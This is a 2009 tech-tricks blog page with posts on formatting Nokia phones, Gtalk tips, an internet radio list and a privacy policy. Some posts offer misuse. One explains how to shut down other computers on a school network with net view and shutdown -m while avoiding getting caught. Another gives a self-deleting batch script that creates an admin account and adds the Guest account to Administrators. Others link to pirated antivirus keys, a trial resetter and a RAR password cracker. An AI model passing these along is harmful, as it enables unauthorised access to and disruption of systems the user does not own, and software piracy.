Format Nokia Mobile

Posted by Agent X | Tuesday, May 12, 2009 | , , | 5 comments »

Guys most of you should be using Symbian OS Mobiles in Nokia like Nseries and 6600 etc . .
However after a period of time , it will become damn slow and HANGS frequently and becomes annoying , so the only solution to restore it back to normal is to FORMAT it . .

Here are the steps to format :


1. First create a backup file in your PC using Nokia PC suite , because u will loose all ur data from MEMORY CARD , so its better you take a bach up in ur PC

2. Now you can format your Memory card just by
Menu -> Tools -> Memory -> option and then select "Format mem. card"

3. Again restore the BACKUP file from your PC to mobile using Nokia Pc Suite . .

4. Now your problem will be resolved and thats it . . .

-------------------------------------------------------------------------------------------------
Even after formatting your memory card , if ur cell keeps on hanging , then the only solution is to FORMAT your PHONE MEMORY

1. First create a backup file in your PC using Nokia PC suite , because u will loose all ur data from MEMORY CARD , so its better you take a bach up in ur PC

2. Now there are two kinds of Format , soft and hard format
*#7370# -- (soft format) (Always do this , if ur problem is not solved go to hard)
*#7780# -- (hard format

3. It will ask you for password and it is 12345 (default code) .

4. It will format your phone completely and now your symbian mobile will be fresh like u purchased from the shop . .

5. Again restore the BACKUP file from your PC to mobile using Nokia Pc Suite . .

6. Now your problem is solved . .


------------------------------------

Note :
1.Instead of formatting ur mobile , u can download the latest Firmware phone updates
and then connect ur phone with the sim in it with any general profile and run the update
it'll format as well as update ur phone and usually I ll do this trick . . . ..

2.Hard format clears the phone memory completing including the Secondary as well as the primary memory ... that is the storage memory and the RAM memory.. not a single setting or any trace of any kind of initial use can be noted ...

3.Soft format again formats completely but only for a few settings and information remains in the RAM memory and again when u re-insert ur MMC into the phone some softwares catch up with this saved files in the memory and they work perfectly normal . .

Read More......

KIS/KAV 2009 Keys 12th May Update

Posted by Agent X | Tuesday, May 12, 2009 | , , , | 0 comments »

Nowadays the scrutiny of keys have increased very much by KIS/KAV,Things are getting tougher and tougher

These are the latest keys for those who use KIS 2009 to update from May 12th 2009 onwards.There are many keys in the archive which survived May 11th update.

Click here to download . .

Note : If you guys feel exhausted of using this Keys and want a trial resetter just CLICK here . .
and you can also have a ESET Demo keys for 100 days for free and for more information click here . . .

Read More......

Privacy Policy

Posted by Agent X | Tuesday, May 12, 2009


Privacy Policy for http://pctrickzmania.blogspot.com




At http://pctrickzmania.blogspot.com, the privacy of our visitors is of extreme importance to us. This privacy policy document outlines the types of personal information is received and collected by http://pctrickzmania.blogspot.com and how it is used.



Log Files
Like many other Web sites, http://pctrickzmania.blogspot.com makes use of log files. The information inside the log files includes internet protocol ( IP ) addresses, type of browser, Internet Service Provider ( ISP ), date/time stamp, referring/exit pages, and number of clicks to analyze trends, administer the site, track user’s movement around the site, and gather demographic information. IP addresses, and other such information are not linked to any information that is personally identifiable.

E-mail Subscription
If a user wishes to subscribe to our posts via e-mail (powered by Feedburner), We ask for contact information such as name and email address. Out of respect for our users’ privacy, a way to opt-out of these communications is provided

Cookies and Web Beacons
A cookie is a piece of data stored on the user’s computer tied to information about the user. http://pctrickzmania.blogspot.com use cookies for tracking visitors’ activity.

Some of our advertising partners may use cookies and web beacons on our site. Our advertising partners include Google Adsense, .

Google’s use of the DART cookie enables it to serve ads to you based on your visit to this site and other sites on the Internet. You may opt out of the use of the DART cookie by visiting the Google ad and content network privacy policy.

These third-party ad servers or ad networks use technology to the advertisements and links that appear on http://pctrickzmania.blogspot.com send directly to your browsers. They automatically receive your IP address when this occurs. Other technologies ( such as cookies, JavaScript, or Web Beacons ) may also be used by the third-party ad networks to measure the effectiveness of their advertisements and / or to personalize the advertising content that you see.

http://pctrickzmania.blogspot.com
has no access to or control over these cookies that are used by third-party advertisers.

You should consult the respective privacy policies of these third-party ad servers for more detailed information on their practices as well as for instructions about how to opt-out of certain practices. http://pctrickzmania.blogspot.com's privacy policy does not apply to, and we cannot control the activities of, such other advertisers or web sites.

If you wish to disable cookies, you may do so through your individual browser options. More detailed information about cookie management with specific web browsers can be found at the browsers' respective websites.

Links
This Web site contains links to other sites. Please be aware that we are not responsible for the privacy practices of such other sites. We encourage our users to be aware when they leave our site and to read the privacy statements of each and every Web site that collects personally identifiable information. This privacy statement applies solely to information collected by this Web site.

Contact Information
If you require any more information or have any questions about our privacy policy, please feel free to contact us through SHOUTMIX(Chat With Me)in our home page . .

Read More......

Shutdown Pc's at School

Posted by Agent X | Sunday, May 10, 2009 | , | 4 comments »

Do u know , we can easily switch off all PC's in school and colleges and this is one of the most important trick which i did in my coll and fooled most of teachers . make sure that you dont get caught . . .

So here I go thankfully there's the shutdown function in cmd mode

First of all you need to have access to a cmd prompt on the network for this to work.

If it's disabled you can obviously run everything from .bat files.

So first type in

Code:
Net View


This will give you all the names for all the computers on the network.

Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.

Now next step is to do the following one

Code:
shutdown -i


which will give you a gui interface and you'll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like "owned" or somethin Smile.

commands you will use if you just wanna use the command interface are

Code:
shutdown -m //computername
- shutsdown the pc.

Code:
shutdown -m -c "owned"
shutdown with a comment.

Code:
shutdown -l
logoff the user.

Code:
shutdown -r
restart the computer.

and so on...


So thats it you are done and now u can shut down any PC connected in a network and make ur teachers fool . . Feel free to ask any doubts regarding this here . .

Read More......

Nowadays its possible to convert any GUEST account into ADMIN just by few basic tricks . All you need to do is copy the code below,


copy/paste it into Notepad and save it as Guest2admin.bat on your desktop.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0





Double-click the file to execute or type the above-given code in Command Prompt.

Note: This also creates a net account which is also accessible through nets open and feel free to post any queries regarding this . .

Read More......

Listen free online radio through Gtalk or your favorite messenger. You can use this online radio service either via the browser interface (inside gmail) or the Gtalk application itself.This online chat radio is made possible by the guys from gtalk2voip. Google Talk, MSN/Live Messenger and Yahoo Messenger users now can connect to a number of Internet Radio Broadcasting stations and start listening radio streams.
There is more to how to enable the radio...

Steps to listen to free online radio :

1. Subscribe to gtalk2voip by adding service@gtalk2voip.com to your buddy list.
2. Send RADIO command to service@gtalk2voip.com to get list of available radio stations along with their ID’s.
3. To listen a particular radio station, simply send a command RADIO (number/id).

Here is the complete list of online radio stations available through them.



LIST OF AVAILABLE RADIO STATIONS:


100 - 181.fm - Kickin Country (Todays Best Country!), http://scfire-chi0l-1.stream.aol.com:80/stream/1075

101 - 1.FM - Country, http://64.62.194.11:8020/

102 - Atlantic Sound Factory - ASF Radio, http://69.31.50.146:80/

103 - 100.7 Jack FM, San Diego, http://38.116.132.31:9024/

104 - 102.7 FM The Fringe, http://64.72.124.89:8134/

105 - 181.fm - The Buzz (Your Alternative Station!), http://scfire-nyk0l-1.stream.aol.com:80/stream/1022

106 - 181.fm - The Mix Channel (70s, 80s, 90s and Todays Best Music), http://208.53.158.167:8032/

107 - 181.fm - The Eagle (Your Home For REAL Classic Rock!), http://208.53.158.126:8030/

108 - .977 The 80s Channel, http://scfire-ntc0l-2.stream.aol.com:80/stream/1040

109 - 1.FM - Channel X, http://209.51.161.54:8072/

111 - Radio Helsinki - 92.6 MHz, http://88.198.49.11:8000/live56.ogg

201 - KCRW World News, http://scfire-ntc0l-2.stream.aol.com:80/stream/1047

202 - Sporting News Radio, http://scfire-chi0l-2.stream.aol.com:80/stream/1057

203 - KPFK - Southern Californias 90.7 FM News, Talk n Music, http://64.27.31.66:80/

204 - WBUR 90.9 FM, Bostons NPR News Station, http://205.234.188.21:80/

205 - TalkRadioX -- http://talkradiox.com, http://tv.stream-music.net:8332/

206 - Arabian HIT 96.7 FM, Dubai, http://wm-live.abacast.com/arabian_radio-hitfm-24

now to connect, type RADIO number where number is a station numerical ID from the list above.

Note : make sure that you have a good broadband speed of atleast 256Kps to use such service , else its of no use because it will buffer and keeps irritating . . so its highly recommended for high speed broadband users only

Read More......

Google talk invisible Tracker

Posted by Agent X | Sunday, May 10, 2009 | , | 1 comments »

Now a days most of them enters google talk in Invisible mode , so its difficult for us to track and chat with them , in the case of yahoo messenger we can find invisible persons easily (click here ) ..

Steps :



1. Set the chat as off the record with target user ( how? ).
This can be done only when the other user is online. ( need help? )

2. Now try sending chat to that user when he is invisible or offline.

3. If he is invisible, then he will receive chat.

4. But if he Is offline, then you will receive error “ did not receive your chat”.


Explanation:


Point 1: When a chat is set off the record, it will no longer get stored in your Gmail account.

Point 2: When you send a chat message to offline or invisible user, it gets delivered by default. At receiving end if user is online, a chat screen pops up showing him your message. If he is offline, your chat message will go to inbox as a mail.

Now if you put together above points then you will notice that, when you set chat off the record it can’t be delivered to inbox as mail, so it will be delivered only if user is online (no matter if he is invisible).

Now the only tricky part is finding a user online for once to set chat off the records. This doesn’t seem hard as invisible status is still limited to Gmail version of Google Talk and you may be in luck if your friend
uses Google Talk desktop clients/gadgets or third party IM client to chat.

Read More......

Google talk tricks

Posted by Agent X | Sunday, May 10, 2009 | , | 0 comments »

They say talk is cheap. Google thinks it should be free. Google Talk enables you to call or send instant messages to your friends for free–anytime, anywhere in the world.Well u can download gtalk from here or use it online using gmail . . .


With some tricks you can use it more efficiently, Here are some Cool tricks :

General :


Change the font size - While holding the control key, move the scroll wheel on your mouse either up or down. This trick works while being focused in either the read or write area.

Insert line breaks - If you want to have a message that spans multiple paragraphs, just hold shift and hit enter. You can add as many new lines as you want to create.

Bold Text - To write something bold, you can use an asterisk before and after the word, like *this* .

Italic Text - To use italics, use an underscore before an after the word, like _this_ .

Switch windows - Hitting tab will cycle through open windows. It will select minimized conversations, to expand them just hit enter. If you just want to cycle through IM's and don't care about the buddy list, control-tab will do that and will automatically expand a minimized conversation if you settle on one.

Invitation Tips - You don’t need to say Yes or No when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this in the options).

Show Hyperlinks - You can show your homepage or blog URL simply by entering the it in your away message (at the top of the main window). It will automatically turn to a link visible to others.

Listen FM - You can also listen Fm on it (Click here for details ).

Translate and Talk-Google has list of bots that let you translate and talk in any language.

Keyboard Shortcuts :

Ctrl + E - It centralizes the selected text, or the current line.
Ctrl + R - It justifies to the right the selected text, or the current line.
Ctrl + L - It justifies to the left the selected text, or the current line.
Ctrl + I - The same thing does that Tab.
Tab - It is giving the area to each of the windows opened by Google Talk.
Ctrl + Tab - The same thing does that Shift + Tab .
Shift + Tab - The same thing does that Tab but in reverse.
Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers .
Ctrl + 1 (KeyPad) - It does a simple space between the lines.
Ctrl + 2 (KeyPad) - It does a double space between the lines.
Ctrl + 5 (KeyPad) - A space does 1.5 between the lines.
Ctrl + 1 (NumPad) - It goes at the end of the last line.
Ctrl + 7 (NumPad) - It goes at the begin of the last line.
Ctrl + F4 - It closes the current window.
Alt + F4 - It closes the current window.
Alt + Esc - It Minimize all the windows.
Windows + ESC - Open Google Talk (if it's minimized, or in the tray)
F9 - Open Gmail to send an email to the current contact.
F11 - It initiates a telephonic call with your friend.
F12 - It cancels a telephonic call.
Esc - It closes the current window.

Emotions :

:-|

:-O

:-x

:-P

:-D

;-)


:-(

:-)

B-)

:'(

:|

:O

:x

:P

:D

:)

:(

:)

Read More......

Virtual graphic card

Posted by Agent X | Sunday, May 10, 2009 | , , | 3 comments »

This is one of the most interesting trick and it may not be useful for all of them but especially for DIE HARD FANS of PC games . So here comes my post .
Do u know what a GPU is ??
If no is your answer then I will help u out , first GPU stands for graphics processing unit and they are present in the form of internal or external graphic cards in home PC , internal graphic cards are present in along with your processor and external are the one which has to be bought from the market and then use in in the VGA PORT of ur PC , but the external one is the most costliest one and cannot be bought by all people especially students , so that the user may face many difficulties in playing games like FIFA 09 , POP etc which require high graphics , so the only solution for all ur problems is to use emulater and increase your graphics level as high as possible and then play the games which are too good in graphics ..


Click here to download the virtual graphic card ...

NOTE : This is just a trick to play high GRAPHIC games with minimum quality as possible and it is no use if you dont have minimum RAM required to run the game . .

Any queries ? Then feel free to post here .. . . .

Read More......

Eset NOD 32 antivirus

Posted by Agent X | Sunday, May 10, 2009 | , | 2 comments »

ESET Nod32 Antivirus is possibly the Best Antivirus I have ever used. I do not consider myself to be an expert to judge all the antivirus software out there, but from my personal experience I have found this to be the most suitable one for my requirement. It is much lighter compared to other Antivirus software, with hardly any bloatware. It consumes very less memory and does its job of securing the PC without any issue.


I will help u guys in giving some working keys for a period of 100 days and if u still like that i will better suggest u to buy the original version , because I am strongly against PIRACY . . just follow this steps to get that trail keys . ..


Steps :



1. Go to this Promotional Offer page.


2. Enter your email in the text box provided.

3. Check your inbox. You must have got a mail containing a code from :

Pateicamies Jums par izrвdоto interesi par Eset produktiem!
Jыs variet piereмistrзt licenci рajв interneta adresз: http://www.nod32.lv/index.php/page_id/602
Lai to reмistrзtu, izmantojiet reмistrвcijas kodu:
your_code


4. Go to http://www.nod32.lv/index.php/page_id/602 and check “Jauna License”



5. Fill in the details as given below:

Reģistrācijas kods: Enter your code
Reģistrācijas kods atkārtoti: Enter your code again
Klienta vārds: Enter your name
E-pasts: Enter your e-mail
E-pasta adrese atkārtoti: Enter your e-mail again



6. Click on “Send” button and copy your license info.

Lietotāja vārds: EAV-xxxxxx is your user name
Parole: xxxxxxx —> is your password
Derīgs līdz: 24.07.2009 –> is your expiration date


That’s it!! Enjoy ESET Nod32 Antivirus for FREE .. . .

any queries feel free to ask me ..

Read More......

Winrar Password remover

Posted by Agent X | Sunday, May 10, 2009 | , , | 3 comments »

Most of the .RAR files downloaded in net will contain a password and the one who uploads usually does this to earn money and mostly u guys try to avoid this files or downloads , because you loose your earning for many pirated things . So the only case to get rid of it is to break the password and this can be easily done in few steps , all that u need is to download this file and follow the steps

Click here to download and enjoy !!!

Read More......

Windows Tricks

Posted by Agent X | Friday, May 08, 2009 | , | 0 comments »

Here are some keyboard tricks you can use to impress your friends! These are nothing but less known features of the Windows XP operating system. To revert back the screen to previous state, repeat the key combination again.

Trick 1 : (High Contrast) - Hold Shift, Alt and Print Screen keys together. Click on “OK” when a message appears (this enables high contrast on Windows system). The screen should change to black!

Trick 2 : (Magnifier) - Hold Windows key (logo key) and R key together. Type magnify in the run box and then press Enter. This enables magnifier tool and anything near the mouse trail will now appear magnified on top!

Trick 3 : (Invert Windows screen) - This is one of the scariest tricks which turns Windows upside down. You can press Ctrl, Alt and then any of the four arrow keys (Ctrl-Alt-Down will rotate screen by 180 degrees)! I have noticed that this doesn’t work on certain Windows XP machines (It is dependent on video driver).




Note : For further trickz like this , just CLICK HERE

Read More......

Enable right click

Posted by Agent X | Friday, May 08, 2009 | , , | 1 comments »

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

Read More......

Keyboard Disco

Posted by Agent X | Friday, May 08, 2009 | , , | 0 comments »

These codes when executed makes your Caps, Num, Scroll lock keys flash..
very kewlll...i have tried it...

Instructions :

*paste any of the codes in notepad
*Save as AnyFileName.vbs
*Run the file
*to stop, launch task manager and then under "Processes", end wscript.exe

1.This piece of code makes your keyboard a live disco...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


2.This one makes it looks like a chain of light....

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop

Well i tried this and it worked for me . If u have any queries just feel free and

Read More......